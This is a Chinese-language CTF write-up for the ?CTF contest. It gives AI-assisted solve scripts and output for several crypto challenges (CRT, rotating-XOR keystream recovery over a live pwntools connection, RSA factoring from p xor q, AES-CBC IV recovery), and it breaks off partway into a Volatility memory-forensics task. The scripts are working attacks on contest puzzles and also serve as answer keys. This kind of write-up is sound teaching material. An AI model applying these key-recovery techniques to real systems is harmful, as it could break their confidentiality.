?CTF_WriteUp - 米线、米线，你听我说！

crypto#

这我是真不会，基本都ai，建议跳过

[Week1] Basic Number theory#

Gemini Gemini

1
from Crypto.Util.number import long_to_bytes, inverse
2

3
# 挑战中给出的数值
4
p = 71380997427449345634700552609577271052193856747526826598031269184817312570231
5
q = 65531748297495117965939047069388412545623909154912018722160805504300279801251
6
gift1 = 40365143212042701723922505647865230754866250738391105510918441288000789123995
7
gift2 = 10698628345523517254945893573969253712072344217500232111817321788145975103342
8

9
def solve_crt(a1, n1, a2, n2):
10
    """求解同余方程组 x ≡ a1 (mod n1), x ≡ a2 (mod n2)"""
11
    N = n1 * n2
12
    # 使用公式: x = a1*n2*inv(n2,n1) + a2*n1*inv(n1,n2) mod N
13
    # 其中 inv(a, m) 是 a 在模 m 下的乘法逆元
14
    x = (a1 * n2 * inverse(n2, n1) + a2 * n1 * inverse(n1, n2)) % N
15
    return x
16

17
# m 的四种可能同余情况
18
# m 与 (+/-)gift1 模 p 同余
19
# m 与 (+/-)gift2 模 q 同余
20
options = [
21
    (gift1, gift2),
22
    (gift1, -gift2 % q),
23
    (-gift1 % p, gift2),
24
    (-gift1 % p, -gift2 % q)
25
]
26

27
print("正在检查所有4种可能的解：")
28
for res_p, res_q in options:
29
    # 使用中国剩余定理 (Chinese Remainder Theorem) 求解 m
30
    m_candidate = solve_crt(res_p, p, res_q, q)
31
    try:
32
        # 将数字转换回字节，看看它是否是 flag
33
        flag = long_to_bytes(m_candidate)
34
        # 检查结果是否为包含 'flag' 的可打印字符串
35
        if b'flag' in flag:
36
            print(f"[*] 找到 Flag: {flag.decode()}")
37
        else:
38
            print(f"[ ] 不是 Flag: {flag}")
39
    except Exception as e:
40
        print(f"[!] 转换候选值时出错: {e}")

1
正在检查所有4种可能的解：
2
[ ] 不是 Flag: b'YP:\x08gM{\x80\xc0\x9b\xe38\xe1\x86\x81\xe7%\xc8\xae\xce^\x9b^P!\x06\x18\xf0\x92\x87\xf2C\xba"\xba\xe7]\xcbsg\xc0\xf2d\xa3\xc0,\xf6s\'/\x8e\xfd\xdb\xf1\x92\x08\x7f\xe4`\xf4\'s6H'
3
[ ] 不是 Flag: b"5a\x85\x14\xca\xaa\xa4\xce\xcb\xad\x81\xe4\xbb\xd1\xa4Gz\xb6\xa1l\x05\x1c\x00\xccX'\xc4,\xcc\x8f\xfb \xc7Y\xdb\xae\x93\xfc\xf4\xd4?F\xa9\x80C\x84\xd1{\xbec\x02lm\xa3\x85\xbf\xcb\xa0\x1f\xbeJ\x83s\xd0"
4
[ ] 不是 Flag: b'#\xee\xb4\xf3\x9c\xa2\xd6\xb1\xf4\xeeaT%\xb4\xdd\x9f\xab\x12\rbY\x7f]\x83\xc8\xdeU*2Y^\x9eG1\x12\x98,\xfe\xf1\x01\xe7\x1d\xf0\x97\xad\x16\x8aV\x992\xeb\xd4\xa0\xc7|\xbc\xe4\xab\xb3vMX;\xf5'
5
[*] 找到 Flag: flag{Th3_c0rner5t0ne_0f_C2ypt0gr@phy}

[Week1] Strange Machine#

GPTGPT

轮转密钥 (rotating keystream) 式 OTP/XOR 问题

思路（简短）:

服务里 Key.generate() 每次把同一个 seed 循环左移 offset 字节（seed = seed[offset:] + seed[]），因此每次加密使用的 key 都是同一 seed 的不同循环移位版本。

程序在开始时打印了第一个密文 cipher1 = pad(plaintext) xor k1（这是我们要恢复的明文对应的密文）。我们可以用交互选项让服务为任意消息加密。若我们提交空消息（长度 0），padding 会是已知的（整块都是 msg_len 这个字节值），因此得到的密文就是 cipher_i = pad0 xor k_i，从而能直接恢复 k_i： k_i = cipher_i xor pad0。

两个连续的 k_i 和 k_{i+1} 互为循环移位（移位量等于 offset）。因此我们：取到服务打印的 cipher1（对应 k1 与未知明文）；请求两次“空消息”加密，得到 cipher2 和 cipher3，从而恢复 k2 和 k3；计算出把 k2 旋转多少字节可以得到 k3，这个旋转量就是 offset（模 msg_len）；用 offset 把 k2 反向旋转得到 k1； plaintext_padded = cipher1 xor k1，去 PKCS 风格 padding 就拿到明文。最后把明文通过菜单选项 2 提交，拿 flag。

关键点：通过观察 base64 解码后密文的字节长度可以直接得到 msg_len，并且 pad 的实现保证当 msg_len < 256 时 padding 是单字节重复（题目代码的实现保证这一点），所以空消息的 padding 是已知的 bytes([msg_len]) * msg_len。

1
#!/usr/bin/env python3
2
# -*- coding: utf-8 -*-
3
from pwn import remote, xor
4
from base64 import b64decode
5
import re
6

7
HOST = 'challenge.ilovectf.cn'
8
PORT = 30001
9

10
def parse_b64_from_line_str(line: str) -> str:
11
    """
12
    Parse patterns like: [*] 首次密文(base64):b'...'
13
    Return the inner base64 string (as str), or fallback part after colon.
14
    """
15
    m = re.search(r"b'([^']+)'", line)
16
    if m:
17
        return m.group(1)
18
    # fallback: take after last colon and strip
19
    part = line.split(':', 1)[-1].strip()
20
    # if starts with b' and ends with '
21
    if part.startswith("b'") and part.endswith("'"):
22
        return part[2:-1]
23
    return part
24

25
def rotate(bs: bytes, s: int) -> bytes:
26
    s %= len(bs)
27
    return bs[s:] + bs[:s]
28

29
def main():
30
    r = remote(HOST, PORT)
31
    # read until the line containing the first cipher
32
    first_cipher_b64 = None
33
    while True:
34
        raw = r.recvline(timeout=5)
35
        if not raw:
36
            break
37
        try:
38
            line = raw.decode('utf-8', errors='ignore')
39
        except:
40
            line = str(raw)
41
        # print(line, end='')  # uncomment to debug
42
        if '首次密文(base64):' in line or '首次密文' in line:
43
            b64 = parse_b64_from_line_str(line)
44
            if b64:
45
                first_cipher_b64 = b64
46
                break
47
            # maybe next line contains the b'...'
48
            nxt_raw = r.recvline(timeout=2)
49
            if not nxt_raw:
50
                break
51
            try:
52
                nxt = nxt_raw.decode('utf-8', errors='ignore')
53
            except:
54
                nxt = str(nxt_raw)
55
            first_cipher_b64 = parse_b64_from_line_str(nxt)
56
            break
57

58
    if not first_cipher_b64:
59
        print("无法读取首次密文，退出。收到的最后输出（utf-8-ignore）:")
60
        print(r.recv(timeout=1).decode('utf-8', errors='ignore'))
61
        return
62

63
    c1 = b64decode(first_cipher_b64)
64
    msg_len = len(c1)
65
    print(f"[+] detected msg_len = {msg_len}")
66
    pad0 = bytes([msg_len]) * msg_len
67

68
    def enc_empty():
69
        r.sendline("1")                 # send menu choice as str; pwntools will encode
70
        # wait prompt (decode stream until prompt appears)
71
        blk = r.recvuntil("请输入要加密的消息".encode(), timeout=3) if isinstance(b"dummy", bytes) else None
72
        # send an empty line (service will treat it as empty input)
73
        r.sendline(b"")
74
        # read until we see the line that contains the ciphertext
75
        while True:
76
            raw = r.recvline(timeout=4)
77
            if not raw:
78
                break
79
            try:
80
                line = raw.decode('utf-8', errors='ignore')
81
            except:
82
                line = str(raw)
83
            if '你的消息已加密(密文):' in line or '你的消息已加密' in line:
84
                return parse_b64_from_line_str(line)
85
        return None
86

87
    print("[*] 请求两次空消息加密以恢复轮转 keystream...")
88
    b64_2 = enc_empty()
89
    if not b64_2:
90
        print("enc_empty failed (1)")
91
        return
92
    b64_3 = enc_empty()
93
    if not b64_3:
94
        print("enc_empty failed (2)")
95
        return
96

97
    c2 = b64decode(b64_2)
98
    c3 = b64decode(b64_3)
99

100
    k2 = xor(c2, pad0)
101
    k3 = xor(c3, pad0)
102

103
    s = None
104
    for shift in range(msg_len):
105
        if rotate(k2, shift) == k3:
106
            s = shift
107
            break
108
    if s is None:
109
        print("无法确定 offset（未找到使 k2 轮转到 k3 的 shift）")
110
        return
111
    print(f"[+] detected offset = {s} (mod {msg_len})")
112

113
    k1 = rotate(k2, (-s) % msg_len)
114
    padded = xor(c1, k1)
115
    pad_len = padded[-1]
116
    if pad_len <= 0 or pad_len > msg_len:
117
        print("[!] padding length 看起来不对，打印 padded (hex):")
118
        print(padded.hex())
119
        return
120

121
    if padded[-pad_len:] != bytes([pad_len]) * pad_len:
122
        print("[!] padding 验证失败，但仍尝试截取前部")
123
    plaintext = padded[:-pad_len]
124
    print("[+] recovered plaintext (bytes):", plaintext)
125
    try:
126
        print("[+] recovered plaintext (utf-8):", plaintext.decode())
127
    except:
128
        pass
129

130
    # submit via menu option 2
131
    r.sendline("2")
132
    r.recvuntil("请输入待校验的明文", timeout=3)
133
    r.sendline(plaintext)
134
    # read responses
135
    out = r.recvall(timeout=3)
136
    try:
137
        print(out.decode('utf-8', errors='ignore'))
138
    except:
139
        print(out)
140
    r.close()
141

142
if __name__ == "__main__":
143
    main()

1
(base) ➜  [Week1] Strange Machine python exp.py
2
[+] Opening connection to challenge.ilovectf.cn on port 30001: Done
3
[+] detected msg_len = 16
4
[*] 请求两次空消息加密以恢复轮转 keystream...
5
/Users/chao/tmp/ctf/crypto/[Week1] Strange Machine/exp.py:69: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
6
  r.sendline("1")                 # send menu choice as str; pwntools will encode
7
[+] detected offset = 3 (mod 16)
8
[+] recovered plaintext (bytes): b'Oh,you find it!'
9
[+] recovered plaintext (utf-8): Oh,you find it!
10
/Users/chao/tmp/ctf/crypto/[Week1] Strange Machine/exp.py:131: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
11
  r.sendline("2")
12
/Users/chao/tmp/ctf/crypto/[Week1] Strange Machine/exp.py:132: BytesWarning: Text is not bytes; assuming UTF-8, no guarantees. See https://docs.pwntools.com/#bytes
13
  r.recvuntil("请输入待校验的明文", timeout=3)
14
[+] Receiving all data: Done (68B)
15
[*] Closed connection to challenge.ilovectf.cn port 30001
16
: [*] 这是你的flag: flag{6d8c67e5-c9fe-4eb9-8eb1-806e3821978f}

[Week1] beyondHex#

学到了学到了

1
# 挑战中的密文
2
base17_string = "807G6F429C7FA2200F46525G1350AB20G339D2GB7D8"
3

4
# Base17 (17进制) 使用的字符集
5
base17_alphabet = "0123456789ABCDEFG"
6

7
# 将Base17字符串转换为十进制整数
8
decimal_value = 0
9
for char in base17_string:
10
    decimal_value = decimal_value * 17 + base17_alphabet.find(char)
11

12
# 将整数转换为字节，然后用ASCII解码
13
# 首先，计算所需的字节数
14
byte_length = (decimal_value.bit_length() + 7) // 8
15
# 转换为字节
16
byte_string = decimal_value.to_bytes(byte_length, 'big')
17
# 解码得到flag
18
flag = byte_string.decode('ascii')
19

20
print(flag)
21
# 输出: flag{welc0me_t0_?CTF!}

[Week1] xorRSA#

GPTGPT

1
# Attempt to recover p and q given n and x = p ^ q, then recover the flag m from c.
2
# This uses a bit-by-bit backtracking reconstruction using constraints from n mod 2^k.
3
# The provided n, e, c, p_q are pasted from the user's problem.
4
from math import ceil, log2
5

6
n = 18061840786617912438996345214060567122008006566608565470922708255493870675991346333993136865435336505071047681829600696007854811200192979026938621307808394735367086257150823868393502421947362103403305323343329530015886676141404847528567199164203106041887980250901224907217271412495658238000428155863230216487699143138174899315041844320680520430921010039515451825289303532974354096690654604842256150621697967106463329359391655215554171614421198047559849727235032270127681416682155240317343037276968357231651722266548626117109961613350614054537118394055824940789414473424585411579459583308685751324937629321503890169493
7
e = 65537
8
c = 17953801553187442264071031639061239403375267544951822039441227630063465978993165328404783737755442118967031318698748459837999730471765908918892704038188635488634468552787554559846820727286284092716064629914340869208385181357615817945878013584555521801850998319665267313161882027213027139165137714815505996438717880253578538572193138954426764798279057176765746717949395519605845713927900919261836299232964938356193758253134547047068462259994112344727081440167173365263585740454211244943993795874099027593823941471126840495765154866313478322190748184566075583279428244873773602323938633975628368752872219283896862671494
9
x = 88775678961253172728085584203578801290397779093162231659217341400681830680568426254559677076410830059833478580229352545860384843730990300398061904514493264881401520881423698800064247530838838305224202665605992991627155227589402516343855527142200730379513934493657380099647739065365753038212480664586174926100
10

11
# helper functions
12
def bits_of(n):
13
    return n.bit_length()
14

15
BITS = max(bits_of(n), bits_of(x))
16
mask_cache = [(1<<i)-1 for i in range(BITS+2)]
17

18
n_bits = n.bit_length()
19

20
# Precompute n mod 2^k values to compare quickly
21
n_mods = [n & mask_cache[k] for k in range(BITS+1)]
22

23
# We'll reconstruct p and q LSB to MSB.
24
x_bits = [(x>>i)&1 for i in range(BITS)]
25

26
# We'll maintain partial product array: product_mod = current partial product mod 2^k
27
# To update efficiently when we set bit k for p or q, we add contributions p_k * (q_partial) << k and q_k * (p_partial) << k and p_k*q_k << (2k) but latter won't affect modulo 2^{k+1} until 2k < k+1 (i.e. never), so we only need to consider cross-terms.
28
# Simpler (and safe): compute product from known bits each time, since BITS ~ 2048 worst-case but actual p and q ~1024 bits; computing convolution each step is okay.
29

30
from functools import lru_cache
31

32
@lru_cache(None)
33
def compute_partial_product(p_bits_tuple, q_bits_tuple):
34
    # p_bits_tuple and q_bits_tuple are tuples of bits (LSB..MSB known length k)
35
    k = len(p_bits_tuple)
36
    P = 0
37
    Q = 0
38
    for i, b in enumerate(p_bits_tuple):
39
        if b:
40
            P |= (1<<i)
41
    for i, b in enumerate(q_bits_tuple):
42
        if b:
43
            Q |= (1<<i)
44
    return (P * Q) & ((1<<k)-1)
45

46
# backtracking
47
from collections import deque
48

49
def recover_p_q(n, x):
50
    B = x.bit_length()
51
    # We'll try to find p and q with up to B bits, but actual primes may have fewer; allow up to n.bit_length()
52
    max_bits = n.bit_length()//2 + 2  # rough bound
53
    max_bits = max(B, max_bits)
54
    # Start with empty bits
55
    stack = deque()
56
    # state: (i, p_bits_tuple, q_bits_tuple)
57
    stack.append((0, (), ()))
58
    attempt = 0
59
    while stack:
60
        i, p_bits, q_bits = stack.pop()
61
        attempt += 1
62
        if attempt % 100000 == 0:
63
            print(f'Attempts {attempt}, depth {i}')
64
        if i >= max_bits:
65
            # constructed enough bits, try forming integers and check full product == n
66
            P = sum((bit<<idx) for idx, bit in enumerate(p_bits))
67
            Q = sum((bit<<idx) for idx, bit in enumerate(q_bits))
68
            if P*Q == n:
69
                return P, Q
70
            continue
71
        xi = x_bits[i] if i < len(x_bits) else 0
72
        # possible bit pairs (a,b) with a xor b == xi
73
        candidates = []
74
        if xi == 0:
75
            candidates = [(0,0),(1,1)]
76
        else:
77
            candidates = [(0,1),(1,0)]
78
        for a,b in candidates:
79
            new_p = p_bits + (a,)
80
            new_q = q_bits + (b,)
81
            # compute partial product modulo 2^{i+1}
82
            prod_mod = compute_partial_product(new_p, new_q)
83
            if prod_mod != (n & ((1<<(i+1))-1)):
84
                continue
85
            # otherwise push next
86
            stack.append((i+1, new_p, new_q))
87
    return None, None
88

89
p, q = recover_p_q(n, x)
90
if p is None:
91
    print("Failed to recover p and q.")
92
else:
93
    if p*q != n:
94
        p, q = q, p  # swap maybe
95
    print("Recovered p and q. Checking primality...")
96
    print("p bitlen:", p.bit_length(), "q bitlen:", q.bit_length())
97
    # compute private exponent d
98
    from math import gcd
99
    phi = (p-1)*(q-1)
100
    def inv(a, m):
101
        # modular inverse
102
        return pow(a, -1, m)
103
    d = inv(e, phi)
104
    # recover m
105
    m = pow(c, d, n)
106
    # convert to bytes
107
    def long_to_bytes(n):
108
        s = hex(n)[2:]
109
        if len(s)%2:
110
            s = '0'+s
111
        return bytes.fromhex(s)
112
    flag = long_to_bytes(m)
113
    print("Flag:", flag)

[Week2] AES_mode#

看不懂，这题算Gemini的。AES-CBC

1
from Crypto.Cipher import AES
2
from Crypto.Util.number import long_to_bytes
3
from binascii import unhexlify
4

5
# 题目给出的数据
6
xor_output = 91749376808341004327450956291130629671202939702313462998246826182668975563684
7
last_ciphertext_hex = b'8f325d5b5c5454680628fa08746d67cf'
8
msg = b'Welcome to ?CTF! , I hope you can have fun!!!!!!'
9

10
# --- 第一步：恢复密钥 (Key) ---
11

12
# 将大数分割为高128位和低128位
13
# 高128位 (hint_upper)
14
hint_upper_long = xor_output >> 128
15
# 低128位 (hint_lower ^ key)
16
xor_lower_long = xor_output & ((1 << 128) - 1)
17

18
# key = hint_upper ^ (hint_lower ^ key)
19
key_long = hint_upper_long ^ xor_lower_long
20
key = long_to_bytes(key_long, 16)
21

22
print(f"✅ Recovered Key: {key.hex()}")
23

24
# --- 第二步：逆向 CBC 解密链 ---
25

26
# 准备明文块和最后一块密文
27
p1 = msg[0:16]
28
p2 = msg[16:32]
29
p3 = msg[32:48]
30
c3 = unhexlify(last_ciphertext_hex)
31

32
# 创建一个 ECB 模式的解密器，用于解密单个区块
33
# 注意：虽然原始模式是 CBC，但我们手动进行 XOR，所以只需要核心的块解密功能，即 ECB
34
decrypter = AES.new(key, AES.MODE_ECB)
35

36
# 异或操作辅助函数
37
def xor_bytes(a, b):
38
    return bytes(x ^ y for x, y in zip(a, b))
39

40
# 1. 求 C2
41
decrypted_c3 = decrypter.decrypt(c3)
42
c2 = xor_bytes(decrypted_c3, p3)
43

44
# 2. 求 C1
45
decrypted_c2 = decrypter.decrypt(c2)
46
c1 = xor_bytes(decrypted_c2, p2)
47

48
# 3. 求 iv (flag_content)
49
decrypted_c1 = decrypter.decrypt(c1)
50
iv = xor_bytes(decrypted_c1, p1)
51

52
# 组装最终的 flag
53
flag = b'flag{' + iv + b'}'
54
print(f"🚩 Final Flag: {flag.decode()}")

1
✅ Recovered Key: 9b39ce9c46e63788507896d6c16f2d33
2
🚩 Final Flag: flag{CBc_Us3s_Iv!=ECb}

forensics#

[Week2] 你也喜欢win7吗#

解压得到内存镜像，先探明系统版本vol -f memory.raw windows.info得到：

1
Variable  Value
2

3
Kernel Base  0xf80003e06000
4
DTB  0x187000
5
Symbols  file:///Users/chao/miniconda3/lib/python3.13/site-packages/volatility3/symbols/windows/ntkrnlmp.pdb/3844DBB920174967BE7AA4A2C20430FA-2.json.xz
6
Is64Bit  True
7
IsPAE  False
8
layer_name  0 WindowsIntel32e
9
memory_layer  1 FileLayer
10
KdDebuggerDataBlock  0xf80003ff70a0
11
NTBuildLab  7601.17514.amd64fre.win7sp1_rtm.
12
CSDVersion  1
13
KdVersionBlock  0xf80003ff7068
14
Major/Minor  15.7601
15
MachineType  34404
16
KeNumberProcessors  2
17
SystemTime  2025-10-02 17:19:03+00:00
18
NtSystemRoot  C:\Windows
19
NtProductType  NtProductWinNt
20
NtMajorVersion  6
21
NtMinorVersion  1
22
PE MajorOperatingSystemVersion  6
23
PE MinorOperatingSystemVersion  1
24
PE Machine  34404
25
PE TimeDateStamp  Sat Nov 20 09:30:02 2010

确实是win7，win7sp1_rtm

1
(base) ➜  forensics vol -f memory.raw windows.pstree
2
Volatility 3 Framework 2.26.2
3

4
PID  PPID  ImageFileName  Offset(V)  Threads  Handles  SessionId  Wow64  CreateTime  ExitTime  Audit  Cmd  Path
5

6
4  0  System  0xfa800905c840  90  556  N/A  False  2025-10-02 15:07:27.000000 UTC  N/A  -  -  -
7
* 232  4  smss.exe  0xfa800a263b30  3  33  N/A  False  2025-10-02 15:07:27.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\smss.exe  \SystemRoot\System32\smss.exe  \SystemRoot\System32\smss.exe
8
304  288  csrss.exe  0xfa800aff3860  9  444  0  False  2025-10-02 15:07:28.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\csrss.exe  -  -
9
344  288  wininit.exe  0xfa800b55cb30  3  76  0  False  2025-10-02 15:07:28.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\wininit.exe  -  -
10
* 468  344  lsm.exe  0xfa800c04d190  11  238  0  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\lsm.exe  C:\Windows\system32\lsm.exe  C:\Windows\system32\lsm.exe
11
* 460  344  lsass.exe  0xfa800b093b30  8  877  0  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\lsass.exe  C:\Windows\system32\lsass.exe  C:\Windows\system32\lsass.exe
12
* 444  344  services.exe  0xfa800b079440  12  215  0  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\services.exe  C:\Windows\system32\services.exe  C:\Windows\system32\services.exe
13
** 640  444  svchost.exe  0xfa800b182290  8  295  0  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\svchost.exe  C:\Windows\system32\svchost.exe -k RPCSS  C:\Windows\system32\svchost.exe
14
** 1568  444  SearchIndexer.  0xfa800af3eb30  13  683  0  False  2025-10-02 15:07:36.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\SearchIndexer.exe  C:\Windows\system32\SearchIndexer.exe /Embedding  C:\Windows\system32\SearchIndexer.exe
15
*** 2204  1568  SearchProtocol  0xfa800a193360  8  277  0  False  2025-10-02 17:18:30.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\SearchProtocolHost.exe  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe15_ Global\UsGthrCtrlFltPipeMssGthrPipe15 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"   C:\Windows\system32\SearchProtocolHost.exe
16
*** 1836  1568  SearchFilterHo  0xfa800b1d79c0  5  93  0  False  2025-10-02 17:18:30.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\SearchFilterHost.exe  "C:\Windows\system32\SearchFilterHost.exe" 0 508 512 520 65536 516   C:\Windows\system32\SearchFilterHost.exe
17
** 1304  444  svchost.exe  0xfa800a145b30  7  107  0  False  2025-10-02 15:11:00.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\svchost.exe  -  -
18
** 2392  444  svchost.exe  0xfa800b6eb8c0  10  367  0  False  2025-10-02 15:07:37.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\svchost.exe  C:\Windows\System32\svchost.exe -k LocalServicePeerNet  C:\Windows\System32\svchost.exe
19
** 1060  444  svchost.exe  0xfa800b8a8960  13  317  0  False  2025-10-02 15:09:31.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\svchost.exe  C:\Windows\System32\svchost.exe -k secsvcs  C:\Windows\System32\svchost.exe
20
** 1496  444  sppsvc.exe  0xfa800b84b060  4  151  0  False  2025-10-02 15:09:31.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\sppsvc.exe  C:\Windows\system32\sppsvc.exe  C:\Windows\system32\sppsvc.exe
21
** 776  444  svchost.exe  0xfa800b21c060  28  558  0  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\svchost.exe  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted  C:\Windows\System32\svchost.exe
22
*** 1428  776  dwm.exe  0xfa800b4e09b0  3  85  1  False  2025-10-02 15:07:30.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\dwm.exe  "C:\Windows\system32\Dwm.exe"  C:\Windows\system32\Dwm.exe
23
** 264  444  svchost.exe  0xfa800b2bc060  22  663  0  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\svchost.exe  C:\Windows\system32\svchost.exe -k NetworkService  C:\Windows\system32\svchost.exe
24
*** 3048  264  rdpclip.exe  0xfa800a234b30  8  169  1  False  2025-10-02 16:48:56.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\rdpclip.exe  rdpclip  C:\Windows\system32\rdpclip.exe
25
** 1128  444  wmpnetwk.exe  0xfa800b76a060  13  416  0  False  2025-10-02 15:07:36.000000 UTC  N/A  \Device\HarddiskVolume1\Program Files\Windows Media Player\wmpnetwk.exe  "C:\Program Files\Windows Media Player\wmpnetwk.exe"  C:\Program Files\Windows Media Player\wmpnetwk.exe
26
** 1516  444  svchost.exe  0xfa800b6b6b30  25  350  0  False  2025-10-02 15:07:37.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\svchost.exe  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation  C:\Windows\system32\svchost.exe
27
** 944  444  svchost.exe  0xfa800b287b30  18  506  0  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\svchost.exe  C:\Windows\system32\svchost.exe -k LocalService  C:\Windows\system32\svchost.exe
28
** 1232  444  taskhost.exe  0xfa800b44f420  9  222  1  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\taskhost.exe  "taskhost.exe"  C:\Windows\system32\taskhost.exe
29
** 724  444  svchost.exe  0xfa800a8a1350  24  613  0  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\svchost.exe  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted  C:\Windows\System32\svchost.exe
30
*** 1860  724  audiodg.exe  0xfa800a172060  7  128  0  False  2025-10-02 17:18:44.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\audiodg.exe  C:\Windows\system32\AUDIODG.EXE 0x5f4  C:\Windows\system32\AUDIODG.EXE
31
** 564  444  svchost.exe  0xfa800b0f2270  10  355  0  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\svchost.exe  C:\Windows\system32\svchost.exe -k DcomLaunch  C:\Windows\system32\svchost.exe
32
** 820  444  svchost.exe  0xfa800b23a9e0  37  1078  0  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\svchost.exe  C:\Windows\system32\svchost.exe -k netsvcs  C:\Windows\system32\svchost.exe
33
** 532  444  spoolsv.exe  0xfa800b3666d0  14  580  0  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\spoolsv.exe  C:\Windows\System32\spoolsv.exe  C:\Windows\System32\spoolsv.exe
34
** 1048  444  svchost.exe  0xfa800b3816c0  19  313  0  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\svchost.exe  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork  C:\Windows\system32\svchost.exe
35
364  352  csrss.exe  0xfa8009068060  10  283  1  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\csrss.exe  %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  C:\Windows\system32\csrss.exe
36
* 2620  364  conhost.exe  0xfa80091b6b30  2  59  1  False  2025-10-02 15:23:50.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\conhost.exe  \??\C:\Windows\system32\conhost.exe  C:\Windows\system32\conhost.exe
37
400  352  winlogon.exe  0xfa800b057060  3  117  1  False  2025-10-02 15:07:29.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\winlogon.exe  winlogon.exe  C:\Windows\system32\winlogon.exe
38
1488  1392  explorer.exe  0xfa800b4eeb30  34  1145  1  False  2025-10-02 15:07:30.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\explorer.exe  C:\Windows\Explorer.EXE  C:\Windows\Explorer.EXE
39
* 2024  1488  wordpad.exe  0xfa80091e5b30  6  203  1  False  2025-10-02 17:16:30.000000 UTC  N/A  \Device\HarddiskVolume1\Program Files\Windows NT\Accessories\wordpad.exe  "C:\Program Files\Windows NT\Accessories\WORDPAD.EXE" "C:\Users\C3ngH\Desktop\hint.txt"  C:\Program Files\Windows NT\Accessories\WORDPAD.EXE
40
* 2624  1488  mspaint.exe  0xfa800b3f7a70  6  127  1  False  2025-10-02 17:16:41.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\mspaint.exe  "C:\Windows\system32\mspaint.exe"   C:\Windows\system32\mspaint.exe
41
* 2020  1488  cmd.exe  0xfa800a1ca630  1  22  1  False  2025-10-02 15:23:50.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\cmd.exe  "C:\Windows\system32\cmd.exe"   C:\Windows\system32\cmd.exe
42
** 2716  2020  DumpIt.exe  0xfa800b5fe060  1  25  1  True  2025-10-02 17:19:00.000000 UTC  N/A  \Device\HarddiskVolume1\Users\C3ngH\Desktop\DumpIt.exe  DumpIt.exe  C:\Users\C3ngH\Desktop\DumpIt.exe
43
2516  528  csrss.exe  0xfa800a23d210  7  77  3  False  2025-10-02 16:48:55.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\csrss.exe  %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  C:\Windows\system32\csrss.exe
44
1252  528  winlogon.exe  0xfa800a273060  4  98  3  False  2025-10-02 16:48:55.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\winlogon.exe  winlogon.exe  C:\Windows\system32\winlogon.exe
45
* 716  1252  LogonUI.exe  0xfa800a2cdb30  7  186  3  False  2025-10-02 16:48:55.000000 UTC  N/A  \Device\HarddiskVolume1\Windows\System32\LogonUI.exe  "LogonUI.exe" /flags:0x0  C:\Windows\system32\LogonUI.exe

发现这个

1
* 2024  1488  wordpad.exe  0xfa80091e5b30  6  203  1  False  2025-10-02 17:16:30.000000 UTC  N/A  \Device\HarddiskVolume1\Program Files\Windows NT\Accessories\wordpad.exe  "C:\Program Files\Windows NT\Accessories\WORDPAD.EXE" "C:\Users\C3ngH\Desktop\hint.txt"  C:\Program Files\Windows NT\Accessories\WORDPAD.EXE
2

3
